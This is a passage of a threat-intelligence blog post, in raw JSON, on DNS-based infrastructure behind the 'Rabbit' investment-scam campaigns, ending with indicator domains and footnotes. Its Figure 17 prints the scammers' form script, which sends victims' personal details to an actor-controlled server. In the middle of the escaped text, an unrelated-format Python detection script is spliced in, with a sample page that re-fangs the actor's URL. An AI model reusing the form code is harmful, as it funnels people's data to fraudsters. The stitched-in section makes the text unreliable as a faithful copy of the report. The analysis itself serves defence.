API documentation for the actor\u2019s validation API<sup>26<\/sup><\/p>\n<table>\n<tbody>\n<tr>\n<td class=\"code-format\">\n<pre>$('form').submit(function (event){\r\n    $(this).submit(false);\r\n    event.preventDefault();\r\n    event.stopPropagation();\r\n    event.stopImmediatePropagation();\r\n    if($('.iti__selected-dial-code').length){\r\n        var prefix = $('.iti__selected-dial-code').html().slice(1)\r\n        $(this).append(`&lt;input type=\"hidden\" name=\"prefix\" value=\"${prefix}\" \/&gt; `)\r\n    }\r\n    var host = `&host=${$(location).attr('hostname')}`\r\n    var url=`&url=${$(location).attr('href')}`\r\n    var so=`&so=Google Finance`\r\n    var args = host + url + so\r\n    var search = location.search.substring(1);\r\n    \r\n    $.ajax({\r\n            type: \"POST\",\r\n            url: 'https:\/\/mcraftdb[.]tech\/api\/v1\/submit\/a6111ace-7304-4d9b-8dfe-9aafb7e9638e\/' + \"?\" + search,\r\n            data: $(this).serialize() + args,\r\n            headers: $(this).headers,\r\n            dataType: 'json',\r\n            crossDomain: true,\r\n            success: function (response) {\r\n                if (response.status === true) {\r\n                    document.location.replace(response.data);\r\n                } else {\r\n                    document.location.href = location.protocol + '\/\/' + location.host + location.pathname.substring(0, location.pathname.lastIndexOf('\/') + 1) + 'thanks.html';\r\n                }\r\n            },\r\n        })\r\n\r\n    var btn = $(this).find(':submit')\r\n    \r\n    btn.prop('disabled', true)\r\n    setTimeout(function () {\r\n        btn.prop('disabled', false)\r\n\r\n    },30000)\r\n})<\/pre>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">Figure 17. 
API call used by Ruthless Rabbit to perform validation checks on the user<sup>27<\/sup><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p>Interestingly, none of the forms in these campaigns have a field to enter an email address, but the response examples in Figure 16 indicate an email is required. We discovered that embedded in the HTML is a script with a function <span class=\"code-format\">generateRandomEmail()<\/span> (see Figure 18) that writes a new email address into a hidden form field every time the page is loaded. This indicates that the actor may not actually use the phone number and email address to contact the user, but instead uses them only to perform the validation checks. Most of the campaigns do, however, perform checks on the user\u2019s IP geolocation via <span class=\"code-format\">ipgeolocation[.]io<\/span> and <span class=\"code-format\">ipinfo[.]io<\/span>, two legitimate geolocation lookup tools.<\/p>\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure18.jpg\" alt=\"Figure 18. HTML code showing the generateRandomEmail() function\"><\/p>\n<p class=\"image-caption\">Figure 18. HTML code showing the <span class=\"code-format\">generateRandomEmail()<\/span> function<\/p>\n<p>Users who pass the validation checks will be routed to some sort of investment platform where they will be prompted to enter their financial information to complete the registration for the investment program. After numerous tests, however, we were unable to reach that final step. Despite passing the validation checks for all personal details, including the IP geolocation and phone number, we still received a failed response stating, \u201cCant register lead, no more fallbacks available;\u201d. 
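The validation flow described above (the form script in Figure 17, the `thanks.html` fallback, the `generateRandomEmail()` stub, and the calls to public geolocation services) gives a captured landing page a recognisable shape that can be fingerprinted from a saved copy. The Python below is an added example rather than anything from Infoblox or the actor: the regular expressions are ours, and the HTML sample is constructed for the example, reusing the cloaking endpoint shown in Figure 17 and one of the geolocation hosts named in the text (the body of `generateRandomEmail()` in the sample is assumed, since the page does not show it).

```python
"""Fingerprint a saved investment-scam landing page for kit traits.

Added example; patterns are derived from the behaviour described in the
text (Figure 17 form script, thanks.html fallback, generateRandomEmail(),
geolocation lookups). SAMPLE_HTML is constructed for the example and
reuses the cloaking endpoint from Figure 17.
"""
import re
from typing import Dict, List

KIT_TRAITS = {
    # POST of lead data to the cloaking/validation API: /api/v1/submit/<uuid>/
    "cloaking_submit_api": re.compile(
        r"https?://[\w.-]+/api/v1/submit/"
        r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}/", re.I),
    # Rejected leads are bounced to a sibling thanks.html page.
    "thanks_fallback": re.compile(r"['\"]thanks\.html['\"]"),
    # Hidden email field filled with a per-load random address.
    "random_email_stub": re.compile(r"\bgenerateRandomEmail\s*\("),
    # Client-side geolocation via the public services named in the text.
    "geo_lookup": re.compile(
        r"https?://(?:ipinfo\.io|(?:api\.)?ipgeolocation\.io|ipapi\.co)\b", re.I),
    # intl-tel-input dial-code element used to derive the phone prefix.
    "intl_tel_prefix": re.compile(r"iti__selected-dial-code"),
}


def fingerprint(html: str) -> Dict[str, str]:
    """Map each matched trait name to the first matching snippet."""
    hits: Dict[str, str] = {}
    for name, rx in KIT_TRAITS.items():
        m = rx.search(html)
        if m:
            hits[name] = m.group(0)
    return hits


def is_kit_page(html: str, threshold: int = 3) -> bool:
    """Flag a page when at least `threshold` independent traits co-occur;
    any single trait (a geolocation call, say) is common on benign sites."""
    return len(fingerprint(html)) >= threshold


def cloaking_hosts(html: str) -> List[str]:
    """Hosts that receive the lead data; these are the infrastructure to track."""
    rx = re.compile(r"https?://([\w.-]+)/api/v1/submit/", re.I)
    return sorted({m.group(1).lower() for m in rx.finditer(html)})


# Constructed sample page, modelled on the Figure 17 script.
SAMPLE_HTML = """
<form><input type="tel" id="phone"><div class="iti__selected-dial-code">+1</div>
<input type="hidden" name="email" id="email"></form>
<script>
fetch("https://ipinfo.io/json").then(r => r.json()).then(g => window.geo = g);
// Assumed body: the page only tells us the function exists.
function generateRandomEmail() { return Math.random().toString(36).slice(2) + "@example.com"; }
document.getElementById("email").value = generateRandomEmail();
$('form').submit(function (event) {
  $.ajax({ type: "POST",
    url: 'https://mcraftdb.tech/api/v1/submit/a6111ace-7304-4d9b-8dfe-9aafb7e9638e/' + "?" + location.search.substring(1),
    success: function (r) { if (r.status === true) { location.replace(r.data); }
      else { location.href = location.pathname.replace(/[^/]*$/, '') + 'thanks.html'; } } });
});
</script>
"""
```

`fingerprint(SAMPLE_HTML)` returns all five traits and `cloaking_hosts()` yields `mcraftdb.tech`, the same host as the documentation site, which is the pivot to track rather than the throwaway `.pro` landing domains. Run the same functions over the HTML bodies in a urlscan or crawler export to surface sibling pages that share the kit.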
Oddly enough, there was no information on this type of response in the actor\u2019s API documentation.<\/p>\n<h3>The Importance of DNS<\/h3>\n<p>Threat actors operating these large-scale and increasingly sophisticated scams exploit DNS to help build and maintain their infrastructure. Over the years, actor abuse of DNS mechanisms, such as RDGAs and TDSs, has been underreported in the security community, despite being crucial to malicious campaigns.<\/p>\n<p>Some investment scam actors capitalize on malicious TDSs to operate their campaigns. A TDS enables threat actors to strengthen their infrastructure, making it more resilient by providing the ability to hide malicious content from security researchers and bots. For example, one actor we\u2019ve been tracking uses an HTTP-based TDS to shield their malicious scam landing pages. We show an instance of a redirection chain in their campaign in Figure 19. Only by tracking these TDSs through DNS are we able to detect and block the infrastructure at scale, before the redirections even occur.<\/p>\n<p><img decoding=\"async\" src=\"\/wp-content\/uploads\/uncovering-actor-ttp-patterns-and-the-role-of-dns-in-investment-scams-figure19.png\" alt=\"Figure 19. Redirection chain for an investment scam actor\u2019s TDS\"><\/p>\n<p class=\"image-caption\">Figure 19. Redirection chain for an investment scam actor\u2019s TDS<sup>28<\/sup><\/p>\n<p>Actors also take advantage of RDGAs to create large numbers of domains to use in their campaigns, which enables them to hide in plain sight and change out domains often. As we wrote last summer:<\/p>\n<p><em>\u201cScammers use RDGAs for the same reasons that other threat actors use them: their domains are frequently blocked or taken down by service providers. 
Consequently, it&#8217;s advantageous for them to have a steady stream of new domains with which to execute their scams.\u201d<\/em><\/p>\n<h3>Conclusion<\/h3>\n<p>There are so many RDGA domains created every day that it is impossible for human researchers to find and assess them all. Through the lens of DNS, we are able to leverage automated detection and correlate these investment scam domains at scale. Threat actors like Reckless and Ruthless Rabbits will be relentless in their attempts to trick as many users as possible. Because these types of scams have proven to be <strong>highly profitable<\/strong> for them, they will continue to grow rapidly\u2014both in number and sophistication.<\/p>\n<h3>Indicators of Activity<\/h3>\n<table>\n<thead>\n<tr>\n<th>Indicator<\/th>\n<th>Note<\/th>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td class=\"code-format\">middle.sturdypants[.]com<br \/>\nbrilliantwallaby[.]info<br \/>\nencouragingtax[.]info<br \/>\ntyxarai[.]org<br \/>\nupkeep-vocal[.]com<br \/>\nextra-largewrinkles[.]info<br \/>\nport-rusty-time[.]com<br \/>\nlibrary-novel-axe[.]com<br \/>\nacoustic-fund-rate[.]info<br \/>\ntemple-well-known[.]info<br \/>\nroomyspeedboat[.]info<br \/>\nlongmarble[.]info<br \/>\nsixcrowd[.]com<br \/>\nmercifulknife[.]com<br \/>\nwjulbucks[.]info<br \/>\nkcfebdrill[.]info<br \/>\nalmarsilk[.]info<br \/>\niaprwall[.]info<br \/>\nwmaycurr[.]info<br \/>\nbmaypost[.]info<br \/>\nfjunmedi[.]info<br \/>\nfjulswap[.]info<br \/>\nfaugswap[.]info<br \/>\nssepcoin[.]info<br \/>\nkoctice[.]info<br \/>\nlnovchalk[.]info<br \/>\nqpdecbid[.]info\n<\/td>\n<td>Indicators used by Reckless Rabbit in investment scam campaigns<\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">bortjob[.]pro<br \/>\ntopsmot[.]pro<br \/>\nsitemot[.]pro<br \/>\nviserbik[.]pro<br \/>\ngoaljob[.]pro<br \/>\nsomajob[.]pro<br \/>\nwasakot[.]pro<br \/>\nbrudamot[.]pro<br \/>\ndropbik[.]pro<br \/>\neasyjob[.]pro<br \/>\nkinabik[.]pro\n<\/td>\n<td>Domains used by Ruthless Rabbit in 
investment scam campaigns<\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">bitcoineverestai[.]app<br \/>\nbitcoin-eprex[.]com<br \/>\nechelonyieldai[.]app<br \/>\neco-terra[.]app<br \/>\neverix-edge[.]org<br \/>\ngptifexai[.]com<br \/>\nimmediatebitwave[.]app<br \/>\nimmediateluminary[.]com<br \/>\nimmediatemomentum[.]site<br \/>\nquantumflash[.]org<br \/>\nsolidreturn[.]app\n<\/td>\n<td>Sample of domains used by an unnamed actor for investment scams <\/td>\n<\/tr>\n<tr>\n<td class=\"code-format\">vensotixapp-platform[.]store<br \/>\nvasezonixapp[.]guru<br \/>\nvensotixapp[.]click<br \/>\nvenzotexapp[.]cloud<br \/>\naportunex[.]app<br \/>\naportunex-app[.]shop<br \/>\naportunex-app[.]trade<br \/>\naportunex-app[.]wiki<br \/>\naportunexapp[.]top<br \/>\naportunexapp[.]bond<br \/>\naportunexapp[.]help<br \/>\naportunexapp[.]trade<br \/>\naportunexapp[.]wiki<br \/>\nbitcoin-apex[.]guru<br \/>\nbitcoin-apex[.]help<br \/>\nbitcoin-apex[.]website<br \/>\nbitcoinapex-platform[.]click<br \/>\nbitcoinapex-platform[.]guru<br \/>\nbitcoinapex-platform[.]top<br \/>\nbitcoinapex[.]website\n<\/td>\n<td>Sample of RDGA and registered DDGA domains used by an unnamed actor for investment scams<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3 style=\"font-size: 18px;\">Footnotes<\/h3>\n<ol style=\"font-size: 14px;\">\n<li><a href=\"https:\/\/www.ftc.gov\/news-events\/news\/press-releases\/2025\/03\/new-ftc-data-show-big-jump-reported-losses-fraud-125-billion-2024\" target=\"_blank\"><strong>https:\/\/www.ftc.gov\/news-events\/news\/press-releases\/2025\/03\/new-ftc-data-show-big-jump-reported-losses-fraud-125-billion-2024<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/f217e772-6deb-4cbc-88fd-b6b46363494e\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/f217e772-6deb-4cbc-88fd-b6b46363494e<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0195f7b6-1cda-77ce-aadd-22dda511aa0e\" 
target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0195f7b6-1cda-77ce-aadd-22dda511aa0e<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/aca53e46-291b-46bd-bc67-76179d82c20a\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/aca53e46-291b-46bd-bc67-76179d82c20a\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0195d87a-5ee5-7228-b6e3-c1968ffc562b\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0195d87a-5ee5-7228-b6e3-c1968ffc562b\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0195ce8b-6b4e-7770-b8d5-cea621d1b835\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0195ce8b-6b4e-7770-b8d5-cea621d1b835\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0195ce8e-3549-700b-addc-64a4879a5ef2\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0195ce8e-3549-700b-addc-64a4879a5ef2\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0195fd9d-9679-736a-8652-99397922991a\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0195fd9d-9679-736a-8652-99397922991a\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/insights.infoblox.com\/resources-research-report\/infoblox-research-report-registered-dgas-the-prolific-new-menace-no-one-is-talking-about\" target=\"_blank\"><strong>https:\/\/insights.infoblox.com\/resources-research-report\/infoblox-research-report-registered-dgas-the-prolific-new-menace-no-one-is-talking-about<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/0ba64979-2186-44ed-858e-51f030c9651b\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/0ba64979-2186-44ed-858e-51f030c9651b\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/4859f1d7-d337-4f5e-bfb0-e3a8d677a77b\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/4859f1d7-d337-4f5e-bfb0-e3a8d677a77b\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/567a05cb-cae2-4937-a326-2f314c289720\/\" 
target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/567a05cb-cae2-4937-a326-2f314c289720\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/924de331-a6ff-45f7-a4cc-cb13ca93f23f\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/924de331-a6ff-45f7-a4cc-cb13ca93f23f\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/3f999960-0b0f-4cfe-96ae-78cebca95290\/#transactions\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/3f999960-0b0f-4cfe-96ae-78cebca95290\/#transactions<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/responses\/23fb5db0618f6a48381978574a34168554a6ecd14f7d21a1d754d27a8ca4eea8\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/responses\/23fb5db0618f6a48381978574a34168554a6ecd14f7d21a1d754d27a8ca4eea8\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/924de331-a6ff-45f7-a4cc-cb13ca93f23f\/#transactions\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/924de331-a6ff-45f7-a4cc-cb13ca93f23f\/#transactions<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/responses\/7402355aa0d7eb0248bf6fdfb572a43e6457e5c1b26719147464ea224e5009a7\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/responses\/7402355aa0d7eb0248bf6fdfb572a43e6457e5c1b26719147464ea224e5009a7\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/01956c44-fe9a-7113-a0c8-f025f9d4dc9e\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/01956c44-fe9a-7113-a0c8-f025f9d4dc9e<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/01956c44-fe9a-7113-a0c8-f025f9d4dc9e#links\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/01956c44-fe9a-7113-a0c8-f025f9d4dc9e#links<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/019585ef-23c0-7000-bdaf-babc56433b08\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/019585ef-23c0-7000-bdaf-babc56433b08<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/01958f39-aa3e-7001-ab7d-fbe0e3bab026\" 
target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/01958f39-aa3e-7001-ab7d-fbe0e3bab026<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/8c5fe52a-e2c3-4300-8a84-320d79e878da\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/8c5fe52a-e2c3-4300-8a84-320d79e878da\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/5c149a21-977b-4cf7-ae02-7095bf8ac54d\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/5c149a21-977b-4cf7-ae02-7095bf8ac54d\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/fe9b35b4-910d-40a5-8edb-e0babdf75740\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/fe9b35b4-910d-40a5-8edb-e0babdf75740\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/f90ad3c0-a347-4272-abba-d4e2357c3cb6\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/f90ad3c0-a347-4272-abba-d4e2357c3cb6\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/f1273504-36df-4db5-9a7f-2532594d0d04\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/f1273504-36df-4db5-9a7f-2532594d0d04\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/responses\/7b3001eef10d518496867654ec76e4f3c6c33550d7a67780ce0440a4c28b5b50\/\" target=\"_blank\"><strong>https:\/\/urlscan.io\/responses\/7b3001eef10d518496867654ec76e4f3c6c33550d7a67780ce0440a4c28b5b50\/<\/strong><\/a><\/li>\n<li><a href=\"https:\/\/urlscan.io\/result\/85e9ce2c-92f5-48ba-8dfd-ed47d63a9eca\/#redirects\" target=\"_blank\"><strong>https:\/\/urlscan.io\/result\/85e9ce2c-92f5-48ba-8dfd-ed47d63a9eca\/#redirects<\/strong><\/a><\/li>\n<\/ol>\n","protected":false},"author":397,"featured_media":11460,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"_genesis_hide_title":false,"_genesis_hide_breadcrumbs":false,"_genesis_hide_singular_image":false,"_genesis_hide_footer_widgets":false,"_genesis_custom_body_class":"","_genesis_custom_post_class":"","_genesis_layout":"","footnotes":""},"categories":[254],"tags":[893,30,1215,913,40,915,189,930],"class_list":{"0":"post-11459","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-threat-intelligence","8":"tag-domain-name-system","9":"tag-dns","10":"tag-investment-scam","11":"tag-threat-actor","12":"tag-threat-intelligence","13":"tag-rdga","14":"tag-cybersecurity","15":"tag-cybercrime","16":"entry"},"acf":[]}